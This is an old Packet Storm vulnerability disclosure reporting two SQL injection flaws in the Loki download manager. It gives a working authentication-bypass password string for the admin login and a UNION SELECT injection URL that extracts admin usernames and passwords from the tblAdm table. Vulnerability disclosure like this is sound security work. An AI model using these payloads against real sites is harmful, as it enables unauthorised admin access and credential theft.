lokiSQL.txt

2005-06-20T00:00:00
ID PACKETSTORM:38135
Type packetstorm
Reporter hack_912
Modified 2005-06-20T00:00:00

Description

                                        
                                            `hi all  
  
tow SQL injection in Loki download manager  
  
1. in http://localhost/adm/default.asp  
  
user: anyuser  
pass: 'or''='  
  
2. in http://localhost/downmancv/catinfo.asp?cat=' union select null,null,user,null,null,null,null,null,pass,null,null,null,null,null FROM tblAdm '  
  
and u will have user and pass h4ve F4n  
  
Salmanooh  
  
hack_912@hotmail.com  
`